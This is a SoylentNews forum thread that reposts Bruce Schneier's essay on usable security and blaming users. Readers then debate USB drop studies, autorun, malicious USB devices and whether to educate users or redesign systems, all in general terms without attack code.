SoylentNews is people
SoylentNews
Arthur T Knackerbracket has found the following story from Bruce Schneier's blog:
Every few years, a researcher replicates a security study by littering USB sticks around an organization's grounds and waiting to see how many people pick them up and plug them in, causing the autorun function to install innocuous malware on their computers. These studies are great for making security professionals feel superior. The researchers get to demonstrate their security expertise and use the results as "teachable moments" for others. "If only everyone was more security aware and had more security training," they say, "the Internet would be a much safer place."
Enough of that. The problem isn't the users: it's that we've designed our computer systems' security so badly that we demand the user do all of these counterintuitive things. Why can't users choose easy-to-remember passwords? Why can't they click on links in emails with wild abandon? Why can't they plug a USB stick into a computer without facing a myriad of viruses? Why are we trying to fix the user instead of solving the underlying security problem?
Traditionally, we've thought about security and usability as a trade-off: a more secure system is less functional and more annoying, and a more capable, flexible, and powerful system is less secure. This "either/or" thinking results in systems that are neither usable nor secure.
[...] We must stop trying to fix the user to achieve security. We'll never get there, and research toward those goals just obscures the real problems. Usable security does not mean "getting people to do what we want." It means creating security that works, given (or despite) what people do. It means security solutions that deliver on users' security goals without -- as the 19th-century Dutch cryptographer Auguste Kerckhoffs aptly put it -- "stress of mind, or knowledge of a long series of rules."
[...] "Blame the victim" thinking is older than the Internet, of course. But that doesn't make it right. We owe it to our users to make the Information Age a safe place for everyone -- not just those with "security awareness."
(Score: 2, Interesting) by Anonymous Coward on Monday October 03 2016, @07:39PM
He's right on the money. Good security makes the easy path the secure path, aligning the goals of getting the job done with being secure. Bad security makes the secure path the hard path, putting the goal of getting the job done at odds with being secure thus encouraging users to circumvent security for convenience (e.g. using "password" as the actual password). Harness human nature, don't fight it because in the end human nature always wins.
(Score: 3, Insightful) by meustrus on Monday October 03 2016, @07:43PM
The final statement speaks volumes about internet security. Blaming the victim applies equally as well as it does everywhere else: you live in an insecure world, and although we'd like it to be more secure, you should behave according to the actual security you have. It's fair to tell users to stop being slutty, as the case may be, but only if it isn't used as an excuse to not bother improving the security situation. And if they get a virus despite being "protected" it's fair to say the manufacturer of their "protection" may be at fault.
Let's all care about safety and security, fight the causes of danger and insecurity, and make our protections easy and effective.
If there isn't at least one reference or primary source, it's not +1 Informative. Maybe the underused +1 Interesting?
(Score: 1) by Scruffy Beard 2 on Monday October 03 2016, @07:59PM
As far as I can tell, anti-viruses are more trouble than they are worth.
People turn off their critical thinking skills if they think the anti-virus is there to catch them.
(Score: 2, Funny) by Anonymous Coward on Monday October 03 2016, @08:20PM
People had lots of unprotected sex when they thought penicillin could cure anything. AIDS ruined the illusion.
Anti-virus was very effective in the old days when floppy dicks were the infection vector. Ubiquitous internet connectivity ruined the illusion.
(Score: 3, Funny) by Anonymous Coward on Monday October 03 2016, @09:07PM
Heh. I see what you did there.
(Score: 3, Insightful) by mcgrew on Monday October 03 2016, @11:51PM
It's not just that, though. Ignorance causes far more trouble than just not thinking, and you can't blame ignorance on the ignorant. You and I may need no AV, but most people I know IRL think computers are magic.
mcgrewbooks.com mcgrew.info nooze.org
(Score: 2) by maxwell demon on Tuesday October 04 2016, @06:44AM
But they obviously haven't yet learned that using magic means you have to be careful that the demons you control don't get out of control.
The Tao of math: The numbers you can count are not the real numbers.
(Score: 3, Touché) by NotSanguine on Tuesday October 04 2016, @01:46AM
People turn off their critical thinking skills if they think the anti-virus is there to catch them.
This assumes that they have critical thinking skills. Which is an iffy proposition, IMHO.
No, no, you're not thinking; you're just being logical. --Niels Bohr
(Score: 0) by Anonymous Coward on Tuesday October 04 2016, @03:30AM
The problem is that these software packages have "evolved" as companies learned that scare tactics brought in the money.
They they will label even useless "optimizers" as malware, just because people dislike having them on their system.
This in turn inflates the number of hit a scan gets, but also increase the risk of false positives.
(Score: 2) by Scruffy Beard 2 on Tuesday October 04 2016, @06:41PM
That started in earnest after the Sony-BMG rootkit scandal [wikipedia.org]
The Sony virus got a "pass" because, well I would be speculating to say exactly why.
People learned that anti-virus software does not protect them in many cases. You need anti-malware as well because semantics.
(Score: 4, Insightful) by DannyB on Monday October 03 2016, @08:44PM
Yes. Blame the victim!
If you take what the article says . . .
* use simple passwords
* click links in untrusted email
* insert every USB stick you can find (into your computer of course)
But don't try to change the user he says.
Let's compare to:
* lock your house at night, when you leave, and perhaps all the time even when you're at home
* don't leave your house keys under the welcome mat
* lock your car
* don't leave your wallet on the hood of your car while refueling
Those may seem like common sense -- but let's not try to change the user! Oh, no! Somehow, magically, the world should just be a safe place where bad people cannot take advantage of you.
The lower I set my standards the more accomplishments I have.
(Score: 0) by Anonymous Coward on Monday October 03 2016, @08:50PM
On a computer, it's the IT guy's fault.
* use simple passwords
It's the IT guy's fault.
* click links in untrusted email
It's the IT guy's fault.
* insert every USB stick you can find (into your computer of course)
It's the IT guy's fault.
(Score: 3, Insightful) by maxwell demon on Tuesday October 04 2016, @06:50AM
In this case, it's the software designers' fault. When email was new, people were making fun of the idea that an email could spread a virus. When the web was new, it was perfectly safe to follow any link you liked. Thanks to the combined efforts of Netscape and Microsoft, this is no longer the case.
The Tao of math: The numbers you can count are not the real numbers.
(Score: 2) by LoRdTAW on Monday October 03 2016, @09:50PM
Which ones are taught to you in school and by your parents? No, I'll wait.
(Score: 3, Insightful) by DannyB on Tuesday October 04 2016, @01:13PM
They should ALL be taught to you in school and by your parents.
The article seems to be saying that the most sensible basic computer precautions should NOT be taught to you in school and by your parents.
Go ahead and plug every random USB stick into your computer. If you receive an email from an unknown person advising you to download something cool and install it, then go right ahead!
So on one hand, you should lock your doors because the world is unsafe. But on the other hand, when you use a computer, you should just leave yourself wide open to attack and do the most stupid careless things, because if you get hurt -- it's the software designer's fault for not making you safe! You shouldn't have to take any precautions or exercise any common sense.
The lower I set my standards the more accomplishments I have.
(Score: 1, Insightful) by Anonymous Coward on Tuesday October 04 2016, @02:28AM
(Score: 3, Informative) by bradley13 on Tuesday October 04 2016, @05:55AM
Not quite a fair analogy.
- Simple passwords = Be able to use a simple lock on an ordinary front door, not the front end of a bank vault.
- Click links in untrusted mail = Talk to strangers on your porch, without fear they are going to assault and rob you.
- Insert USB sticks = Pick up a dropped envelope to find out which neighbor lost it, without worrying that you will be infected with anthrax.
In this sense, the job of IT professionals is simple (difficult, but simply explained): create a sufficiently robust infrastructure that ordinary human behavior does not lead to catastrophe.
While some security holes are very abstruse, essentially impossible to foresee (Rowhammer), many are just plain stupidity. I still see advanced students and young professionals write code that is open to SQL injection. "Oh, it doesn't matter for this project".
The problems are manifold, but if we go all the way down to the bottom, the root issue may be the lack of any sort of verification of competence. We don't let amateurs (or incompetent professionals) design bridges, but what assurance do we have that the people writing kernel drivers know what they're doing? For all we know, they're script kiddies hired on the cheap. While any sort of global qualification body would be impossible (and likely corrupt), we could enforce qualifications through economics: If a bridge collapses due to faulty design, the company that built it will be held liable. The executives may even land in jail. Hold software companies to the same standard: Your IoT devices are spamming the Internet? Your company is liable for damages, plus getting those devices off of the Internet.
Everyone is somebody else's weirdo.
(Score: 2) by meustrus on Wednesday October 05 2016, @04:41AM
That looks like a great analogy to me, and unfortunately things can't be the same on the internet. Because people have always been able to do terrible things to you. The only difference is that now it's super cheap to send 10,000 copies of junk mail without having to pay the post office. You know it sure would have been different if the email system was designed to allow individual network operators to charge some micropayment for the privilege of forwarding that mail. I suppose the main reason they couldn't, besides ideological reasons, is that microtransactions over the fledgling internet were simply uneconomical. You would need Bitcoin as a prerequisite to bring the transaction fees low enough, which obviously the designers of email couldn't have had. So it will be forever free to send email, lowering the bar to entry for every shady business practice, with no profit incentive for cleaning up the bottomfeeders.
And you know what? That's a good thing. We needed something as useful as email to make any progress on the internet, and its freedom has led to a lot of the success. Not that nobody pays for email. And it's a shame that it's not really possible to maintain a secure email server without the resources of a Google or a Yahoo. But wouldn't it be nice if the user of somebody with those resources was actually getting a fair experience? Without violating their privacy? With some semblance of market competition for the user's attention, not for the advertisers who are the real customers of the internet? If we can somehow eliminate advertising and the need for it, perhaps by making a more crowd-sourced information distribution system (like say SoylentNews or Reddit, or even more distributed like Diaspora), we could make the world a much safer place.
If there isn't at least one reference or primary source, it's not +1 Informative. Maybe the underused +1 Interesting?
(Score: 2) by urza9814 on Thursday October 06 2016, @02:59AM
Yeah, your *neighbors* are probably pretty safe. Physical distance provides much of the security of the real world. The internet doesn't have that. If you put Gates in his mansion in some slum in Elbonia he certainly wouldn't be stopping to talk to the neighbors on his porch or picking up dropped mail or using a standard household door lock. He'd be hiding behind big walls and armed guards -- assuming he doesn't do that already.
On the internet, you are *always* a tourist walking through the worst slum in a foreign city at 3am. Because anyone, anywhere can attack you at any time. You can't behave as you would around your friends and neighbors and assume you'll be safe, because you *aren't* around your friends and neighbors, you're around a bunch of random strangers all across the globe.
People *aren't* that trusting in the real world, and they shouldn't be online either. Consider how people still spread the stories about drugs and razor blades in Halloween candy every year. Even though it pretty much never happens. And even though if there's a razor blade in an apple, the whole damn neighborhood knows which house was giving out apples so it'd be no mystery who did it. The Internet is certainly less safe than knocking on neighborhood doors asking for candy, yet people so often don't think twice before doing the digital equivalent of shoveling down food from some anonymous stranger in Tehran. Sure, it's probably safe. But maybe they used contaminated discount ingredients, or it's expired, and they don't even know. Maybe it's been sitting unattended in the street for a week. Or maybe it's a big slice of Rohypnol pie.
And how many times in this country have we detonated someone's underwear because they left their suitcase lying outside? We treat every random suitcase like a potential bomb, but when it's a digital suitcase attached to an email we should assume there's no way it could be harmful?
(Score: 0) by Anonymous Coward on Monday October 03 2016, @10:41PM
> only if it isn't used as an excuse to not bother improving the security situation.
Yah think? That's his entire point. That the engineering quality needs to improve and stop pushing the responsibility off to the non-experts.
(Score: 2) by meustrus on Wednesday October 05 2016, @04:47AM
I would just like to add to my statement. We need to recognize that a motivated person will always be able to get the best of us. Hopefully, if we are no longer habitually ignoring warning signs because we're getting the wrong signs, we will be more prepared to recognize the warning signs that matter and prepare for them. But it almost never works out that way, and the only way we can get forward is by having an honest conversation about why this happened to begin with. The most important aspect of that in my opinion is why the person was so motivated; it would be much better for us not to be incentivized to do such harm to other people.
If there isn't at least one reference or primary source, it's not +1 Informative. Maybe the underused +1 Interesting?
(Score: 4, Interesting) by VLM on Monday October 03 2016, @07:43PM
counterintuitive things
Culturally I think picking up random electronics and plugging them into secured systems is kinda like picking up random food and clothes discarded in a parking lot and dumping them on your work desk. Hey look, there's a beer bottle in the parking lot, looks like a sip or two left in it, gimme gimmie gimmie oh wait that was pee. I mean what kind of lunatic does stuff like that? What kind of company hires people like that?
Not that a post 1980s era OS design would hurt anything. Or a secure OS would hurt anything. Or secure hardware not having IO ports to plug random crap into. Or a hardware protocol that selectively enforces connectivity beyond mere PC power current negotiation.
But, WTF were you thinking, is still a valid question even in the face of horrible architecture and design. In that way I think the article is just wrong.
A world where you can find underwear laying in the parking lot and safely put it on is ... interesting, and I'm sure it would be a fascinating medical science challenge to accomplish, but not something I find very appealing or culturally acceptable.
(Score: 2) by JoeMerchant on Monday October 03 2016, @08:03PM
I don't think they're proposing a world where you find random underwear in a parking lot and can safely put it on... more, a world where you plug in a USB stick and default configurations don't allow it to automatically infect your computer.
Lots of "security" seems based in the world of Zork. Move North. You were eaten by a grue, you are dead, game over. Try again. You are in a cavern with three exits, North, NorthWest and South. What do you want to do? Eventually, people who keep playing Zork know not to move North from that room (unless you have a lantern, yadda yadda) - point being, you shouldn't have had to play this game before in order to not die.
🌻🌻 [google.com]
(Score: 1) by Francis on Monday October 03 2016, @08:17PM
Pretty much, if you insert a USB disk into a computer, you shouldn't have things executing from it unless you set them up to execute. And documents should never have executables embedded.
(Score: 2) by DannyB on Monday October 03 2016, @08:49PM
I agree with that.
But I disagree with the article's point about not changing the user.
The world is not a safe place. And nothing will magically make it so.
A good lock on your home's front door is better than a poor lock. Just as an OS that doesn't autoexec executables, is better than an OS that does. And better yet, the OS that doesn't autoexec executables should not even recognize it as an executable unless it has the right file permission, and USB media should be set up in your /etc/fstab so that execution cannot happen from that media. But you don't find an /etc/fstab in the OS that traces its history back to a copy of CP/M.
The lower I set my standards the more accomplishments I have.
(Score: 3, Interesting) by VLM on Monday October 03 2016, @09:46PM
The world is not a safe place.
True but my point in the grandparent post is some end user behavior should as a cultural thing be seen as icky. Like eating food out of a dumpster or sharing underwear with random strangers. Or IV needles for that matter. Note thats all actually pretty safe statistically speaking, but still seen as super gross. As it should be.
It appears not to be possible to discuss the cultural aspect of it. We're only allowed to agree that our immune systems should be strong enough to tolerate it, the original author thinks filthy users should not have to behave in a civilized manner and I'm asking them to keep it classy, or at least try.
I think we would all be happy in a world where computer security doesn't suck.
The original article author wants users to continue to behave like dirt bags. Personally I would prefer something a little more civilized and don't mind calling the users on their gross behavior.
(Score: 1) by Francis on Tuesday October 04 2016, @12:53AM
Right. Certain practices are too dangerous to enable, but you can never completely secure against the end user. And if you lock things down too much people hack around it.
(Score: 2) by mcgrew on Tuesday October 04 2016, @12:01AM
A good lock on your home's front door is better than a poor lock.
It doesn't matter, they have crowbars. Your locks will be safe, but not your door or belongings; that's how burglars broke into my house. Besides, what house has no windows?
mcgrewbooks.com mcgrew.info nooze.org
(Score: 1) by Francis on Tuesday October 04 2016, @01:49PM
The point of locks and sturdy doors isn't to prevent people from the possibility of breaking in. The point of it is to raise the signature of people trying to break in. If they're having to mess around with the lock for a few minutes, that's going to deter a lot of burglars that would like to be in and out in a matter of a couple minutes. Especially if you're in an area that people frequent unpredictably.
If you can make your stuff slightly harder to break into than the other people's stuff, then you'll find a lot of criminals just skip it for the next house.
(Score: 3, Insightful) by JNCF on Monday October 03 2016, @10:25PM
Pretty much, if you insert a USB disk into a computer, you shouldn't have things executing from it unless you set them up to execute.
I don't want that to happen either, but most users do. Most users want to be able to use USB sticks in the same ports that they can plug keyboards into. Most users don't want to have to manually enable a keyboard after plugging it in. Therefore, most users implicitly want a computer that will allow malicious USB drives to type any arbitrary command into their computers (even though they don't explicitly realise this). If the problem were made clear to them, I think most users would begrudgingly choose convenience over security and then quickly proceed to forget about the problem entirely. The traditional trade-off Schneier eschews is very real, and users simply can't have both security and convenience in the levels they desire. Hopefully our priorities will change as people get more educated.
(Score: 1) by Francis on Tuesday October 04 2016, @12:50AM
A lot of this has to do with expected use and visibility. Usb disks are usually used to transfer files between computers, so it makes no sense to enable execution from there.
Likewise email attachments should have to be downloaded manually before manual execution. And documents shouldn't ever be executable.
The point is that reasonable actions should be planned for and secured. Complete security is never possible and users do need to do their share, but the system shouldn't be enabling incompetence or hiding risks.
(Score: 3, Informative) by JNCF on Tuesday October 04 2016, @01:53AM
I was trying to point out that even with execution from USB drives disabled your computer can still be susceptible to malicious drives that simply pretend to be keyboards and type commands in. There is a decision to be made here: we cannot simultaneously have universal ports, permissionless keyboards that don't rely on brittle third-party certificate schemes, and a feeling of safety when plugging in a USB drive found in a parking lot. Obviously, we should grant USB keyboards permissions individually. I suspect most users would hate that, but I'd love to be wrong.
(Score: 1) by Francis on Tuesday October 04 2016, @01:46PM
That's true, but that's something else that the computers should be guarding against. Same goes for those cracks that involve firmware of things like monitors that nobody can reasonably be expected to worry about.
But, at some point, there is a limit to what can reasonably be done about things of this nature. I suspect in terms of malicious devices, a pop up confirming that you plugged in a certain type of device and usb drives not being allowed to type or keyboards not being allowed to have internal memory would make things considerably harder. Probably just a one time deal with some sort of hash to verify that it's the same device that was previously whitelisted.
(Score: 2) by maxwell demon on Tuesday October 04 2016, @07:21AM
They want it because they've been educated to want it. It's also much more convenient to enter a house without first needing to unlock it. Yet I'm not aware of people demanding no-lock front doors.
I'm not aware of anyone in the pre-USB times complaining that you plugged the keyboard to another port than the printer. There were some complaints about PS/2 keyboard and mouse, but that was because they were too similar without being identical; I'm not aware of similar complaints with the earlier serial mice.
Also I'm sure that the vast majority of people don't ever change the keyboard that came with their computer. So there could be keyboard pairing, and the computer could come with the keyboard already paired, just as the OS is already installed.
Also note that people accept entering long sequences of meaningless characters at installation for "product activation" where the only one having an advantage is the provider of the software. You won't tell me that it is not inconvenient. So why should people not accept some inconvenience for hardware installation when they get more security in return? Again, they do accept door locks for security, too.
Of course that doesn't mean the software designers don't also have an obligation to make reasonable security reasonably easy. But that does not mean to sacrifice security for ease of use.
The Tao of math: The numbers you can count are not the real numbers.
(Score: 2) by tangomargarine on Tuesday October 04 2016, @02:17PM
Also I'm sure that the vast majority of people don't ever change the keyboard that came with their computer. So there could be keyboard pairing, and the computer could come with the keyboard already paired, just as the OS is already installed.
A decent idea technically, but I'm sure it would be abused by the companies selling the computers before you can say, "Hey, does anybody remember SecureBoot? That guy standing over you with a hammer assuring you he won't use it?"
"Is that really true?" "I just spent the last hour telling you to think for yourself! Didn't you hear anything I said?"
(Score: 2) by JNCF on Tuesday October 04 2016, @05:51PM
They want it because they've been educated to want it. It's also much more convenient to enter a house without first needing to unlock it. Yet I'm not aware of people demanding no-lock front doors.
We've been using physical locks of some sort for thousands of years, and some folks still fail to keep their doors locked (it seems fairly common on the East coast of the US, anecdotally). I hope that within a generation or two we take information security at least as seriously as we currently take physical security, but I'm very skeptical of our ability to inculturate those concerns into people who haven't been exposed to them at a young age and aren't seeking out better security practices of their own volition. Again, I'd love to be wrong about this. Schneier is basically arguing that we shouldn't even try because that would be blaming the victim, you insensitive clod, you! I really like some of his writing, but I found this particular piece uncompelling.
Also note that people accept entering long sequences of meaningless characters at installation for "product activation" where the only one having an advantage is the provider of the software.
It doesn't matter how much users would prefer a product that doesn't require an activation step if they don't pay for the product. Customer satisfaction is only one factor in the profit motive equation. I agree that people would still use computers if they had more mildly annoying security practices like keyboard permissions by default, I just think that they would prefer computers without that bug/feature. If Windows implemented it and OSX didn't, I think that would generally be seen as a point in favor of OSX. I hope I'm wrong.
(Score: 1, Insightful) by Anonymous Coward on Monday October 03 2016, @09:12PM
Indeed. It seems to me that a lot of this could be solved just by turning autorun off in windows. Of course, it won't solve everything, but it would be a good start.
(Score: 2) by Leebert on Tuesday October 04 2016, @02:11AM
Eh... the USB worm AutoPlay issue has been fixed since something like Windows XP SP2. I don't recall off the top of my head, but I *think* it was sanely set by default in Vista, and certainly in Windows 7.
(Score: 1, Informative) by Anonymous Coward on Tuesday October 04 2016, @07:54AM
Nope. They said they would, but they didn't.
They disabled it for anything that claimed to be a hard drive, but kept it on for anything that claimed to be a read-only media (CD-ROM, etc). And then they published documents on how to make your auto-running-driver-install use the USB IDs of read-only media, to keep autorun working.
It may stop your everyday virus (assuming that the USB ID is in ROM, and when was the last time you saw anything with a ROM chip?) but not someone deliberately leaving a back doored USB stick in the parking lot.
(Score: 2) by tangomargarine on Tuesday October 04 2016, @02:21PM
I believe as of Windows 8.1 the default is, it pops up a menu asking you what you want to do when plug in a USB drive. One of the options is still "auto"run.
(I own a dual-boot Win 8.1 machine.)
http://www.eightforums.com/tutorials/30511-autoplay-turn-off-windows-8-a.html [eightforums.com]
"Is that really true?" "I just spent the last hour telling you to think for yourself! Didn't you hear anything I said?"
(Score: 2) by TheRaven on Tuesday October 04 2016, @08:41AM
sudo mod me up
(Score: 3, Insightful) by Hairyfeet on Monday October 03 2016, @11:14PM
Sigh...haven't actually checked out those "security studies" have you? Protip: Windows hasn't had autorun since it was patched out of Windows XP.
The way they infect the system, which just FYI works just as well on Linux and MacOS, is to exploit the user using the classic dancing bunnies [codinghorror.com] where you make the bait so damned tempting that even if they know they shouldn't they'll run it anyway. In the case of these USB sticks all they had to do was make "(Name of company) confidential salaries list.exe" and they would run it, even disabling the AV if they had that option, just to see what the other guy was making. You can even bypass the local AV by making it an .HTML that takes the user to a page where they are slammed with exploits, all that matters is getting the user to run it which is trivial.
I've seen it a billion times in the shop, from "porn codec.exe" to someone on FB getting a "come see this, isn't it cool?" .HTML that sends them to a page filled with exploits, it really doesn't matter anymore which OS you are using (which is why Android reached a million infected 15 years faster than windows reached the same milestone) all that matters is "can you get the user to do what you want?" and with just a teeny bit of psychology that answer is nearly always "yes".
ACs are never seen so don't bother. Always ready to show SJWs for the racists they are.
(Score: 0) by Anonymous Coward on Tuesday October 04 2016, @08:56AM
Part of the problem is the entire security model around executables. Or rather... the lack of it. Any program I run as user x automatically has the same privileges as user x, which in practice it means it can do whatever it wants to in my home folder containing my documents and other data. Who needs admin or sudo privileges when you can simply ransom or steal the user's data?
The solution is to not allow anything unless explicitly needed. porncodec.exe should not be allowed to do anything other then render porn videos to a framebuffer/texture or whatever a codec does.
My web browser should not be allowed to do anything besides acces the net and place files in select directories for settings, caches or downloads. The web browser should not be allowed to access my home folder unless I have picked a file to be uploaded from that folder using a file picker dialog supplied by the operating system, and then the operating system should open that file in read-only mode and supply the data stream to the browser. Any browser extensions that need more permissions should ask for these at the moment that they need them while clearly indicating why such a permission is needed.
Installers should not be able to go hog-wild doing whatever they want just because I gave permission to do system changes to install a program which I think might be useful but secretly contained a copy skynet.
We need to redesign our operating systems from the ground up, to include security based on behavior blocking from the start, and in ways that are user friendly. Instead of training users to only run software that they trust, I wish to see systems that assume that all code and all data is untrustworthy and to allow safely running this untrustworthy code while knowing that even if it is malicious, it can do only very limited damage.
Also the Android model with tons of blanket permissions required to even install an app is a slight improvement but almost as bad as the desktop situation. You still have very little control over what an app might be doing behind your back.
(Score: 2) by tangomargarine on Tuesday October 04 2016, @02:12PM
Protip: Windows hasn't had autorun since it was patched out of Windows XP.
The way they infect the system, which just FYI works just as well on Linux and MacOS
Large citation needed. The couple times you've actually given me a link to stuff like this before, you've turned out to be full of shit, too.
"Is that really true?" "I just spent the last hour telling you to think for yourself! Didn't you hear anything I said?"
(Score: 2) by Hairyfeet on Thursday October 06 2016, @03:32AM
Want me to wallpaper the page with Linux malware links? I don't think the mods here would like me very much if I did that, but I will be more than happy to show that major exploits are adding Linux support [zdnet.com] because hey guess what kernel Android runs on? You know, that OS that now has passed the number of Windows laptops infected per year as of 2014 [bgr.com] and which now accounts for more than 56% of infections on mobile networks [wirelessdesignmag.com] and beats Windows by a country mile in that category? Yeah I hate to break the news to ya Sparky but its Linux.
Which just FYI proves what I've been saying for over a decade, that Linux much vaunted "security", which just FYI is 15 years behind with R/W/X compared to the much finer grained ACLs, is nothing but security by obscurity and once someone actually popular used Linux it would get pwned. But hey, all those malware ridden systems are running a Linux kernel right? If that isn't worth a Linux party! [ytmnd.com] then nothing is, right?
ACs are never seen so don't bother. Always ready to show SJWs for the racists they are.
(Score: 2) by tangomargarine on Thursday October 06 2016, @02:11PM
In other news, computers in general suck. Welcome to Sturgeon's Law.
zdnet>
However, the Linux malware is based on an old and publicly available proof-of-concept backdoor known as 'cd00r.c', developed by hackers at phenoelit.org to solve the visibility 'problem' of standard backdoors.
Half points on that one. Admittedly apparently the problem still hasn't been fixed.
bgr>
The company says the malware infection rate is at 0.68% for mobile devices, which comes to around 16 million devices worldwide. Downplaying malware infections at its annual Google I/O developers even last year, Google hinted that just 0.5% of total active Android devices might have a malware problem, a percentage that amounted to about 5 million gadgets, according to Google’s own stats at the time.
So it's still a miniscule fraction of the devices out there. What percentage of Windows PCs are infected with something?
The report says that in the second half of 2014 alone, there were as many Android devices infected with malware as Windows laptops.
Notice the quote is laptops only.
wirelessdesignmag>
Nokia Security Center Berlin, powered by Nokia Threat Intelligence Lab, today released research findings showing that in the mobile networks, smartphones pulled ahead of Windows-based computers and laptops, now accounting for 60% of the malware activity observed in the mobile space.
I'm a little curious what exactly they mean by "mobile" in this context. Smartphones, tablets, iTouches, and laptops?
Due to a decrease in adware activity, the overall infection rate in mobile networks declined from 0.75% to 0.49% on Windows-based PCs connected to the Internet via a mobile network
I've been connected to the Internet via a WiFi dongle on my desktop before. Does that count as "mobile"? If laptops count, can they really be referring to cell networks?
In the same time period, smartphone infection rates increased and now account for 60% of infections detected in the mobile networks.
Android continues to be the main mobile platform targeted
For the first time since the report began, iOS-based malware – including XcodeGhost and FlexiSpy – is on the top 20 list. In October 2015 alone, iPhone malware represented 6% of total infections.
So iOS infections are included in that 60%. Sorry to disrupt your Linux-hate hardon there, Skippy.
I guess your links aren't quite as badly full of bullshit as usual. Congrats I guess.
And I know you know that Windows security is more or less just as bad, so you just like bitching about Linux. Can't stand to see people enthusiastic about something I guess.
"Is that really true?" "I just spent the last hour telling you to think for yourself! Didn't you hear anything I said?"
(Score: 2) by tangomargarine on Thursday October 06 2016, @02:13PM
Also, from your previous comment, you seem to be implying that autorun infections "work just as well on Linux and MacOS," which you didn't cover in this reply.
"Is that really true?" "I just spent the last hour telling you to think for yourself! Didn't you hear anything I said?"
(Score: 1) by toddestan on Thursday October 06 2016, @01:26AM
Not quite true. Windows 7 will still autorun off of a CD drive - not sure about Windows 8/10*. So the way it's done is the USB stick will pretend it's a USB CD-ROM drive, and then Windows will autorun whatever the USB stick wants it to run. I've seen this tactic used by some USB memory sticks that want you to install some manager software (no thanks, please just be a USB mass storage device please), but there's certainly no reason that it couldn't be used to attempt to launch something malicious.
*Windows 10 is probably safe though due to the disappearing DVD drive bug, which I have encountered so far on every Windows 10 machine I've come across that still has an optical drive.
(Score: 0) by Anonymous Coward on Tuesday October 04 2016, @07:42AM
It may still be wet inside and short out your computer.
Even worse, until everything is optically connected, you always risk the device you found containing a simple voltage doubler or five (5 volts doubled 5 times is 160 volts).
(Score: 0) by Anonymous Coward on Monday October 03 2016, @08:06PM
If you eat food off the ground, you have a chance of getting sick. You might be sick enough to need hospitalization, and even if your medical bills are covered, you'll still miss work. Even if you don't get fired for missing work, missing work will cost you socially when you lose face time with your peers. You can't afford to eat food off the ground because you will lose social status.
If you pick up USB sticks off the ground and put them in your work computer, your computer might get malware. It's the job of the IT guys to fix malware. By breaking your computer, you made those low-status IT losers do some actual work instead of wasting time like every low-status work-shirker does. You don't lose any social status by making work for the IT guys.
That's the cultural issue: IT ain't my fault, boss!
(Score: 4, Funny) by Anonymous Coward on Monday October 03 2016, @08:12PM
is kinda like picking up random food and clothes discarded in a parking lot and dumping them on your work desk
Don't you judge me.
(Score: 0) by Anonymous Coward on Monday October 03 2016, @08:25PM
YOU BETRAYED THE LAW!
(Score: 0) by Anonymous Coward on Monday October 03 2016, @08:24PM
is kinda like picking up random food and clothes discarded in a parking lot and dumping them on your work desk
I'm the janitor, you insensitive clod. Picking up garbage in the parking lot is my job.
(Score: 2) by DannyB on Monday October 03 2016, @08:51PM
But eating it is probably not in your job description. (Although the employer might think that since you can eat trash from the sparking pots, that he can lower your wages so you don't have to purchase food.)
The lower I set my standards the more accomplishments I have.
(Score: 0) by Anonymous Coward on Tuesday October 04 2016, @09:03AM
I am a robotic janitor, you insensitive clod!
(Score: 2) by PocketSizeSUn on Monday October 03 2016, @09:42PM
Yeah, but that USB key may not be the USB key you *think* it is, regardless of where it came from a bad actor could have replaced your known good key with a bad one. So by *assuming* that a malware infested device will be inserted by a foolish user also protects a reasonable user from a bad actor.
The problem statement is that the user should not have to be paranoid about security as part of the everyday user experience.
Today, every link that is clicked on is potentially a vector for malware and virii, every USB key plugged into a computer, every method of sharing information of every kind, really.
Most users follow a typical risk/reward paradigm where they are at low risk precisely because your average user is of low value. Only when such users are easily exploited for a very low margin is it worth attacking them. Most users don't have to worry about specially crafted JPGs or PDFs because they aren't worth the effort. The users that do have to worry about being specifically target will probably always have to worry no matter what the security model and infrastructure is.
I think the point is we should have an infrastructure that is based from the premise that the user will do something dumb. That alerts should be meaningful and rare and that privilege escalation is a last resort to be avoided at all costs.
The real question is what would such a security infrastructure look like and what limits does it represent?
And passwords ... ye god ... what a horrible method for keeping things secure. Why haven't we transitioned to a public-key infrastructure? Probably because passwords are cheap and easy to implement.
(Score: 2) by FatPhil on Tuesday October 04 2016, @10:52AM
Unprotected private keys are not an alternative to passwords, they are an entirely different type of security. They are "something you have (in a form inconvenient for you, but convenient for malware)" rather than "something you know (but which you share with others liberally)". Things that you have can get lost, copied, or stolen. There are also families of security exploits which can only happen in a PKI scenario, not in a password scanario, it's not a magic bullet.
Of course, you can protect your private keys with a passphrase, but if you think that's better than a password...
Great minds discuss ideas; average minds discuss events; small minds discuss people; the smallest discuss themselves
(Score: 4, Insightful) by LoRdTAW on Monday October 03 2016, @09:50PM
Your missing the main point: The vast majority of people don't understand computer security because they arent taught computer security. Growing up people learn about real word security, don't talk to strangers, cleanliness, lock your doors, etc. They have a connection established early on that says that bottle is probably full of piss and the clothes could have bed bugs or are soiled with god knows what. You lock your door at night because people could walk in, steal shit and possibly hurt you in the process.
Thing is, computers don't trigger those security measures because they weren't taught. If you taught kids computer security instead of playing oregon trail and learning to use MS office, we might actually have people who see a USB stick kicking around and think "Oh hell no". They also might see a bogus email and cautiously open it or delete it outright.
It's called education. And the author seems to acknowledge that no one is doing anything to educate kids who eventually become adults not to do stupid shit and click every link in an email or plug in random USB drives. So we might as well try and mold secure computing around such a careless society. It's certainly not the right way to do things but what can you do on the face of such apathy?
(Score: 2) by mcgrew on Monday October 03 2016, @11:55PM
I agree with you, but people don't understand how this stuff works. If the system were designed correctly you could plug in a random USB stick or click a link in an email. The trouble is that the system's designers aren't up to the task, or are unwilling to tackle it.
mcgrewbooks.com mcgrew.info nooze.org
(Score: 2, Disagree) by Runaway1956 on Monday October 03 2016, @07:50PM
I've got a bunch of computers, which I expect my employees to use in certain ways, to do certain things. WTF do I even have USB ports enabled? Even if a person has non-malicious intentions, he just wants to listen to some music on his USB stick, WTF am I paying him to do so? OK - so maybe I gave in to a bunch of whiners who want to listen to music on my time. Eventually, one of them brings in an infected stick, and the Chinese are in my network, stealing all of my proprietary secrets.
If the IT department is security concious, they've unplugged all those USB ports inside the computer. Best if they remove the plugs, and put a dummy plug in it's place. If, somewhere in the organization, some of the computers actually NEED a USB plug, then we can arrange to have that plug hooked up and working.
Yeah, the author is at least partly correct. Stop trying to educate the user, and fix the machine so that the user can't screw it up. Our computers don't have floppy or CD/DVD drives. They DO HAVE USB ports, which I can use to boot into Linux. Once booted into Linux, I can steal ALL THE SECRETS on that machine.
Idiots. They walk among us, and they look just like real people.
